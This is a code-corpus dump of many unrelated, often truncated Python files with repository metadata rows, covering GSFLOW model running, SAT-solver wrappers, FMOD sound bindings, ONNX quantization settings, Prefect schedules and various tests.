Method to run a gsflow model
Parameters
----------
model_ws : str
parameter to specify the model directory
forgive : bool
forgives convergence issues
gslfow_exe : str or None
path to gsflow_exe, if gsflow_exe is None it will use
the previously defined gsflow_exe variable or the default
gsflow.exe.
Returns
-------
None or (success, buffer)
Examples
--------
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
>>> gsf.run_model()
"""
fn = self.control_file
if gsflow_exe is None:
gsflow_exe = self.gsflow_exe
if not os.path.isfile(gsflow_exe):
print(
"Warning : The executable of the model could not be found. "
"Use the gsflow_exe= parameter to define its path... "
)
return None
normal_msg = [
"normal termination",
] # , "simulation successful"]
if forgive:
normal_msg.append("failed to meet solver convergence criteria")
return self.__run(
exe_name=gsflow_exe,
namefile=fn,
normal_msg=normal_msg,
model_ws=model_ws,
)
def __run(
self,
exe_name,
namefile,
model_ws=".",
silent=False,
report=False,
normal_msg="normal termination",
cargs=None,
):
"""
This function will run the model using subprocess.Popen.
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
success = False
buff = []
# convert normal_msg to lower case for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg.lower()]
elif isinstance(normal_msg, list):
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
if platform.system() in "Windows":
if not exe_name.lower().endswith(".exe"):
exe = which(exe_name + ".exe")
if exe is None:
s = "The program {} does not exist or is not executable.".format(
exe_name
)
raise Exception(s)
else:
if not silent:
s = "pyGSFLOW is using the following executable to run the model: {}".format(
exe
)
print(s)
exe = os.path.normpath(os.path.join(os.getcwd(), exe))
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = "The namefile for this model does not exists: {}".format(
namefile
)
raise Exception(s)
# simple little function for the thread to target
# def q_output(output, q):
# for line in iter(output.readline, b''):
# q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe, namefile]
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
# if platform.system().lower() == "windows":
# self._generate_batch_file()
# cargv = self.__bat_file
# else:
# pass
model_ws = os.path.dirname(self.control_file)
proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
while True:
line = proc.stdout.readline()
c = line.decode("utf-8")
if c != "":
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip("\r\n")
if not silent:
print("{}".format(c))
if report:
buff.append(c)
else:
break
return success, buff
| 33.816106 | 95 | 0.530087 |
466e94eb6dad2cfea42284bb23559a0aba280ee0 | 6,818 | py | Python | tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1879f9bb150054be5bf33fd46a47414b4939529e | [
"MIT"
] | 1 | 2020-12-07T10:37:41.000Z | 2020-12-07T10:37:41.000Z | tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1879f9bb150054be5bf33fd46a47414b4939529e | [
"MIT"
] | null | null | null | tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1879f9bb150054be5bf33fd46a47414b4939529e | [
"MIT"
] | null | null | null | import logging
import pytest
from moto import mock_ec2, mock_iam, mock_sts
from cloudwanderer.cloud_wanderer_resource import CloudWandererResource
from cloudwanderer.storage_connectors import MemoryStorageConnector
from cloudwanderer.urn import URN
from tests.pytest_helpers import create_ec2_instances
logger = logging.getLogger(__name__)
def test_delete_subresources_from_resource(memory_connector, iam_role, iam_role_policies):
"""If we are deleting a parent resource we should delete all its subresources."""
memory_connector.write_resource(resource=iam_role)
memory_connector.write_resource(resource=iam_role_policies[0])
memory_connector.write_resource(resource=iam_role_policies[1])
role_before_delete = memory_connector.read_resource(urn=iam_role.urn)
role_policy_1_before_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
role_policy_2_before_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)
# Delete the parent and ensure the subresources are also deleted
memory_connector.delete_resource(urn=iam_role.urn)
role_after_delete = memory_connector.read_resource(urn=iam_role.urn)
role_policy_1_after_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
role_policy_2_after_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)
assert role_before_delete.urn == iam_role.urn
assert role_policy_1_before_delete.urn == iam_role_policies[0].urn
assert role_policy_2_before_delete.urn == iam_role_policies[1].urn
assert role_after_delete is None
assert role_policy_1_after_delete is None
assert role_policy_2_after_delete is None
| 34.434343 | 109 | 0.661044 |
466f047e17e0d6d7208910c763a4df77317279f9 | 4,596 | py | Python | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 233 | 2016-02-05T20:13:06.000Z | 2022-03-26T13:01:10.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 8 | 2017-12-20T17:07:58.000Z | 2020-08-06T15:44:55.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 15 | 2016-03-22T23:37:56.000Z | 2022-02-27T17:51:08.000Z | """Python wrapper around the _clibs PicoSAT extension."""
import os
from tt.errors.arguments import (
InvalidArgumentTypeError,
InvalidArgumentValueError)
if os.environ.get('READTHEDOCS') != 'True':
from tt._clibs import picosat as _c_picosat
VERSION = _c_picosat.VERSION
def sat_one(clauses, assumptions=None):
"""Find a solution that satisfies the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: If solution is found, a list of ints representing the terms of
the solution; otherwise, if no solution found, ``None``.
:rtype: List[:class:`int <python:int>`] or ``None``
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Let's look at a simple example with no satisfiable solution::
>>> from tt import picosat
>>> picosat.sat_one([[1], [-1]]) is None
True
Here's an example where a solution exists::
>>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]])
[1, -2, -3]
Finally, here's an example using assumptions::
>>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3])
[-1, 2, -3]
"""
try:
return _c_picosat.sat_one(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
def sat_all(clauses, assumptions=None):
"""Find all solutions that satisfy the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: An iterator of solutions; if no satisfiable solutions exist, the
iterator will be empty.
:rtype: Iterator[List[:class:`int <python:int>`]]
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Here's an example showing the basic usage::
>>> from tt import picosat
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]):
... print(solution)
...
[1, 2, 3, 4]
[1, 2, 3, -4]
[1, 2, -3, 4]
[1, 2, -3, -4]
[1, -2, 3, 4]
[1, -2, 3, -4]
We can cut down on some of the above solutions by including an assumption::
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]],
... assumptions=[-3]):
... print(solution)
...
[1, 2, -3, 4]
[1, 2, -3, -4]
"""
try:
return _c_picosat.sat_all(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
| 37.672131 | 79 | 0.650131 |
466f1e4523ee66d1060bcbe9b327e33221329528 | 3,745 | py | Python | tests/test_text_visualization.py | dianna-ai/dianna | 88bcaec001e640c35e5e1e08517ef1624fd661cb | [
"Apache-2.0"
] | 9 | 2021-11-16T09:53:47.000Z | 2022-03-02T13:28:53.000Z | tests/test_text_visualization.py | dianna-ai/dianna | 88bcaec001e640c35e5e1e08517ef1624fd661cb | [
"Apache-2.0"
] | 340 | 2021-03-03T12:55:37.000Z | 2022-03-31T13:53:44.000Z | tests/test_text_visualization.py | dianna-ai/dianna | 88bcaec001e640c35e5e1e08517ef1624fd661cb | [
"Apache-2.0"
] | 5 | 2021-08-19T08:14:35.000Z | 2022-03-17T21:12:46.000Z | import os
import re
import shutil
import unittest
from pathlib import Path
from dianna.visualization.text import highlight_text
def _split_text_into_words(text):
# regex taken from
# https://stackoverflow.com/questions/12683201/python-re-split-to-split-by-spaces-commas-and-periods-but-not-in-cases-like
# explanation: split by \s (whitespace), and only split by commas and
# periods if they are not followed (?!\d) or preceded (?<!\d) by a digit.
regex = r'\s|(?<!\d)[,.](?!\d)'
return re.split(regex, text)
| 42.556818 | 131 | 0.646996 |
466fca56f7b6e59caf823a738ec5c36d18b27c25 | 2,983 | py | Python | setup.py | guilhermeleobas/rbc | 4b568b91c6ce3ef7727fee001169302c3803c4fd | [
"BSD-3-Clause"
] | null | null | null | setup.py | guilhermeleobas/rbc | 4b568b91c6ce3ef7727fee001169302c3803c4fd | [
"BSD-3-Clause"
] | null | null | null | setup.py | guilhermeleobas/rbc | 4b568b91c6ce3ef7727fee001169302c3803c4fd | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
import builtins
import versioneer
if sys.version_info[:2] < (3, 7):
raise RuntimeError("Python version >= 3.7 required.")
builtins.__RBC_SETUP__ = True
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
CONDA_BUILD = int(os.environ.get('CONDA_BUILD', '0'))
CONDA_ENV = os.environ.get('CONDA_PREFIX', '') != ''
from setuptools import setup, find_packages # noqa: E402
DESCRIPTION = "RBC - Remote Backend Compiler Project"
LONG_DESCRIPTION = """
The aim of the Remote Backend Compiler project is to distribute the
tasks of a program JIT compilation process to separate computer
systems using the client-server model. The frontend of the compiler
runs on the client computer and the backend runs on the server
computer. The compiler frontend will send the program code to compiler
backend in IR form where it will be compiled to machine code.
"""
if __name__ == '__main__':
setup_package()
del builtins.__RBC_SETUP__
| 32.78022 | 76 | 0.650352 |
46701c0193cfd9ee406763922c026176cc2a2fc9 | 1,126 | py | Python | src/prefect/schedules/adjustments.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 8,633 | 2019-03-23T17:51:03.000Z | 2022-03-31T22:17:42.000Z | src/prefect/schedules/adjustments.py | concreted/prefect | dd732f5990ee2b0f3d816adb285168fd63b239e4 | [
"Apache-2.0"
] | 3,903 | 2019-03-23T19:11:21.000Z | 2022-03-31T23:21:23.000Z | src/prefect/schedules/adjustments.py | ngriffiths13/prefect | 7f5613abcb182494b7dc12159277c3bc5f3c9898 | [
"Apache-2.0"
] | 937 | 2019-03-23T18:49:44.000Z | 2022-03-31T21:45:13.000Z | """
Schedule adjustments are functions that accept a `datetime` and modify it in some way.
Adjustments have the signature `Callable[[datetime], datetime]`.
"""
from datetime import datetime, timedelta
from typing import Callable
import pendulum
import prefect.schedules.filters
def add(interval: timedelta) -> Callable[[datetime], datetime]:
"""
Adjustment that adds a specified interval to the date.
Args:
- interval (timedelta): the amount of time to add
Returns:
- Callable[[datetime], bool]: the adjustment function
"""
return _adjustment_fn
def next_weekday(dt: datetime) -> datetime:
"""
Adjustment that advances a date to the next weekday. If the date is already a weekday,
it is returned unadjusted.
Args:
- dt (datetime): the datetime to adjust
Returns:
- datetime: the adjusted datetime
"""
pdt = pendulum.instance(dt)
while not prefect.schedules.filters.is_weekday(pdt):
pdt = pdt.add(days=1)
return pdt
| 24.478261 | 90 | 0.683837 |
4671817d5486f1ffa5048135771d27e1109e5cdd | 12,349 | py | Python | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T16:46:21.000Z | 2017-02-21T16:46:21.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T17:57:05.000Z | 2017-02-22T11:28:51.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | null | null | null | from .fmodobject import *
from .fmodobject import _dll
from .structures import TAG, VECTOR
from .globalvars import get_class
class Sound(FmodObject):
def get_length(self, ltype):
len = c_uint()
ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype))
return len.value
def get_music_channel_volume(self, channel):
v = c_float()
ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v)))
return v.value
def set_music_channel_volume(self, id, vol):
ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol)))
def get_subsound(self, index):
sh_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr)))
return Sound(sh_ptr)
def get_sync_point(self, index):
sp = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp)))
return sp.value
def get_sync_point_info(self, point):
name = c_char_p()
offset = c_uint()
offsettype = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype)))
return so(name=name.value, offset=offset.value, offset_type=offsettype.value)
def lock(self, offset, length):
ptr1 = c_void_p()
len1 = c_uint()
ptr2 = c_void_p()
len2 = c_uint()
ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2)))
return ((ptr1, len1), (ptr2, len2))
def release(self):
ckresult(_dll.FMOD_Sound_Release(self._ptr))
def set_subsound(self, index, snd):
check_type(snd, Sound)
ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr))
def set_subsound_sentence(self, sounds):
a = c_int * len(sounds)
ptrs = [o._ptr for o in sounds]
ai = a(*ptrs)
ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai)))
def unlock(self, i1, i2):
"""I1 and I2 are tuples of form (ptr, len)."""
ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1]))
def read_data(self, length):
"""Read a fragment of the sound's decoded data.
:param length: The requested length.
:returns: The data and the actual length.
:rtype: Tuple of the form (data, actual)."""
buf = create_string_buffer(length)
actual = c_uint()
self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual))
return buf.value, actual.value
def seek_data(self, offset):
"""Seeks for data reading purposes.
:param offset: The offset to seek to in PCM samples.
:type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long."""
self._call_fmod("FMOD_Sound_SeekData", offset) | 31.745501 | 128 | 0.639809 |
4671cf40aee848a7cf0a11db6406cdad41f3981d | 7,667 | py | Python | src/pynwb/retinotopy.py | weiglszonja/pynwb | 441c64f332b32eb8141a9d03d92e0fda2fd1ad83 | [
"BSD-3-Clause-LBNL"
] | 132 | 2017-08-05T00:35:18.000Z | 2022-03-22T08:14:18.000Z | src/pynwb/retinotopy.py | weiglszonja/pynwb | 441c64f332b32eb8141a9d03d92e0fda2fd1ad83 | [
"BSD-3-Clause-LBNL"
] | 1,273 | 2017-08-04T05:14:47.000Z | 2022-03-28T13:00:27.000Z | src/pynwb/retinotopy.py | weiglszonja/pynwb | 441c64f332b32eb8141a9d03d92e0fda2fd1ad83 | [
"BSD-3-Clause-LBNL"
] | 68 | 2017-08-04T16:45:19.000Z | 2022-03-22T08:14:15.000Z | from collections.abc import Iterable
import warnings
from hdmf.utils import docval, popargs, call_docval_func, get_docval
from . import register_class, CORE_NAMESPACE
from .core import NWBDataInterface, NWBData
| 52.513699 | 119 | 0.626842 |
46725864f7a8f29464ea63af729e3e78c2a1218d | 370 | py | Python | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | """
Implement a class function for user to put in a zip-code and
search relevant information about business entities in that zip-code area.
"""
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
| 28.461538 | 78 | 0.77027 |
46750d2f3ef713a053808ca00fc559cb70158512 | 283 | py | Python | Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 22ce26c68fea6c7c243ada831e47c52e27a62127 | [
"MIT"
] | 11 | 2020-05-11T08:41:21.000Z | 2022-02-27T08:21:37.000Z | Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 22ce26c68fea6c7c243ada831e47c52e27a62127 | [
"MIT"
] | 9 | 2020-05-12T10:46:06.000Z | 2020-05-28T17:37:19.000Z | Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 22ce26c68fea6c7c243ada831e47c52e27a62127 | [
"MIT"
] | 44 | 2020-05-10T20:53:32.000Z | 2021-04-25T18:47:08.000Z | '''
1. Write a Python program to access a specific item in a singly linked list using index value.
2. Write a Python program to set a new value of an item in a singly linked list using index value.
3. Write a Python program to delete the first item from a singly linked list.
'''
| 31.444444 | 98 | 0.749117 |
46759a54fd059282243dcf32a6f899667fd72ec3 | 25 | py | Python | ngboost/version.py | dsharpc/ngboost | 8c05e0cb3b95bb23d8f30f17042d2fd8926c4014 | [
"Apache-2.0"
] | null | null | null | ngboost/version.py | dsharpc/ngboost | 8c05e0cb3b95bb23d8f30f17042d2fd8926c4014 | [
"Apache-2.0"
] | null | null | null | ngboost/version.py | dsharpc/ngboost | 8c05e0cb3b95bb23d8f30f17042d2fd8926c4014 | [
"Apache-2.0"
] | null | null | null | __version__ = "0.3.4dev"
| 12.5 | 24 | 0.68 |
467608de6f71ab4b616b2d09915c4d849b7654e0 | 624 | py | Python | premailer/tests/test_utils.py | p12tic/premailer | ebfd310dbd0a88b465e811411f67a360e11f3292 | [
"BSD-3-Clause"
] | null | null | null | premailer/tests/test_utils.py | p12tic/premailer | ebfd310dbd0a88b465e811411f67a360e11f3292 | [
"BSD-3-Clause"
] | 1 | 2018-11-23T11:58:22.000Z | 2018-11-23T13:58:13.000Z | premailer/tests/test_utils.py | lavr/premailer | ebfd310dbd0a88b465e811411f67a360e11f3292 | [
"BSD-3-Clause"
] | null | null | null | import unittest
from premailer.premailer import capitalize_float_margin
| 31.2 | 70 | 0.639423 |
4676a784f66c68a2faf6e33e2c3d3bf09c476661 | 1,652 | py | Python | home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | qwertzy-antonio-godinho/dots | 65cd657f785e7da3a3ccb1a808c0fc1b8496e5b1 | [
"Apache-2.0"
] | 6 | 2021-12-26T13:34:32.000Z | 2022-02-08T22:09:38.000Z | src/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | ev3dev/ptvsd | cea22767dd78a812a14e2330a540a368f615224e | [
"MIT"
] | 8 | 2020-07-19T23:39:31.000Z | 2022-02-27T01:38:46.000Z | vscode/extensions/ms-python.python-2020.3.69010/pythonFiles/lib/python/old_ptvsd/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | Adespinoza/dotfiles | e2509402a7fd2623a3ea401b6f9fcbf6a372fc60 | [
"CC0-1.0"
] | 3 | 2020-08-04T02:48:32.000Z | 2020-08-17T01:20:09.000Z | import sys
try:
try:
from _pydevd_bundle_ext import pydevd_cython as mod
except ImportError:
from _pydevd_bundle import pydevd_cython as mod
except ImportError:
import struct
try:
is_python_64bit = (struct.calcsize('P') == 8)
except:
# In Jython this call fails, but this is Ok, we don't support Jython for speedups anyways.
raise ImportError
plat = '32'
if is_python_64bit:
plat = '64'
# We also accept things as:
#
# _pydevd_bundle.pydevd_cython_win32_27_32
# _pydevd_bundle.pydevd_cython_win32_34_64
#
# to have multiple pre-compiled pyds distributed along the IDE
# (generated by build_tools/build_binaries_windows.py).
mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys.platform, sys.version_info[0], sys.version_info[1], plat)
check_name = '_pydevd_bundle.%s' % (mod_name,)
mod = getattr(__import__(check_name), mod_name)
# Regardless of how it was found, make sure it's later available as the
# initial name so that the expected types from cython in frame eval
# are valid.
sys.modules['_pydevd_bundle.pydevd_cython'] = mod
trace_dispatch = mod.trace_dispatch
PyDBAdditionalThreadInfo = mod.PyDBAdditionalThreadInfo
set_additional_thread_info = mod.set_additional_thread_info
global_cache_skips = mod.global_cache_skips
global_cache_frame_skips = mod.global_cache_frame_skips
_set_additional_thread_info_lock = mod._set_additional_thread_info_lock
fix_top_level_trace_and_get_trace_func = mod.fix_top_level_trace_and_get_trace_func
version = getattr(mod, 'version', 0)
| 31.169811 | 107 | 0.725787 |
4677191c1771ec77d8d7c68a2a88766f05fcf790 | 2,843 | py | Python | tests/test_thumbnails.py | pypeclub/openpype4-tests | c0c32b643f63e66609772270fff71e88dcd5b922 | [
"Apache-2.0"
] | null | null | null | tests/test_thumbnails.py | pypeclub/openpype4-tests | c0c32b643f63e66609772270fff71e88dcd5b922 | [
"Apache-2.0"
] | null | null | null | tests/test_thumbnails.py | pypeclub/openpype4-tests | c0c32b643f63e66609772270fff71e88dcd5b922 | [
"Apache-2.0"
] | null | null | null | from tests.fixtures import api, PROJECT_NAME
assert api
THUMB_DATA1 = b"thisisaveryrandomthumbnailcontent"
THUMB_DATA2 = b"thisihbhihjhuuyiooanothbnlcontent"
| 23.890756 | 86 | 0.65248 |
4677247e7b07ffee44bb30042c587480349f229e | 914 | py | Python | POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | d6d52320426172e924081b9df619490baa8c6016 | [
"MIT"
] | 1 | 2021-09-01T01:58:13.000Z | 2021-09-01T01:58:13.000Z | POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | d6d52320426172e924081b9df619490baa8c6016 | [
"MIT"
] | null | null | null | POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | d6d52320426172e924081b9df619490baa8c6016 | [
"MIT"
] | null | null | null | # Generalizando para no repetir o cdigo!
| 28.5625 | 100 | 0.63895 |
467742b9ee49da3193dfeffba9fb6976ebe7eb72 | 2,391 | py | Python | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 136 | 2020-06-01T14:03:31.000Z | 2020-10-28T06:10:50.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 133 | 2020-05-26T13:48:04.000Z | 2020-10-28T05:25:55.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 36 | 2020-05-28T08:18:39.000Z | 2020-10-27T14:46:58.000Z | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype
from nncf.common.graph.operator_metatypes import UnknownMetatype
DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = {
QuantizationTrait.INPUTS_QUANTIZABLE: [
ONNXConvolutionMetatype,
ONNXLinearMetatype,
ONNXAveragePoolMetatype,
ONNXGlobalAveragePoolMetatype,
ONNXAddLayerMetatype,
ONNXMulLayerMetatype,
ONNXBatchNormMetatype,
ONNXHardSigmoidMetatype,
ONNXResizeMetatype,
],
QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype,
ONNXSoftmaxMetatype,
UnknownMetatype],
QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype],
QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: []
}
| 49.8125 | 89 | 0.79632 |
46779bc59fb8e412188640c04f3538454363b415 | 13,483 | py | Python | Package/CONFIG.py | YuanYuLin/samba | ef8aaca2c539b0d241414e7f335b4ff939461558 | [
"MIT"
] | null | null | null | Package/CONFIG.py | YuanYuLin/samba | ef8aaca2c539b0d241414e7f335b4ff939461558 | [
"MIT"
] | null | null | null | Package/CONFIG.py | YuanYuLin/samba | ef8aaca2c539b0d241414e7f335b4ff939461558 | [
"MIT"
] | null | null | null | import ops
import iopc
TARBALL_FILE="samba-4.8.4.tar.gz"
TARBALL_DIR="samba-4.8.4"
INSTALL_DIR="samba-bin"
pkg_path = ""
output_dir = ""
tarball_pkg = ""
tarball_dir = ""
install_dir = ""
install_tmp_dir = ""
cc_host = ""
tmp_include_dir = ""
dst_include_dir = ""
dst_lib_dir = ""
dst_usr_local_lib_dir = ""
| 42.533123 | 112 | 0.705555 |
4677cd39827e65c98f0ade72fd58eb0f79b2c0cc | 671 | py | Python | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | 3 | 2019-08-02T21:02:47.000Z | 2021-09-08T13:59:43.000Z | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# michael a.g. avzis
# orthologue
# (c) 1998-2019 all rights reserved
#
# declaration
# end of file
| 18.638889 | 88 | 0.593145 |
467ab5f703a873dbd5ce9a6760742fdfbfa8b614 | 30 | py | Python | tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 5069e9e53e8ed1f5305167254139b95967102aeb | [
"MIT"
] | 3 | 2020-12-22T10:43:39.000Z | 2021-01-01T16:42:32.000Z | tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 5069e9e53e8ed1f5305167254139b95967102aeb | [
"MIT"
] | null | null | null | tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 5069e9e53e8ed1f5305167254139b95967102aeb | [
"MIT"
] | null | null | null | import os
x = 7
print(x + 1)
| 6 | 12 | 0.566667 |
467b69ecaf5ca591ddc3465f82457df4ea005caa | 448 | py | Python | Mod 03/03 Prova.py | SauloCav/CN | e8de20dbcf1b3ff043743728b7dde2eff1ae8f87 | [
"MIT"
] | null | null | null | Mod 03/03 Prova.py | SauloCav/CN | e8de20dbcf1b3ff043743728b7dde2eff1ae8f87 | [
"MIT"
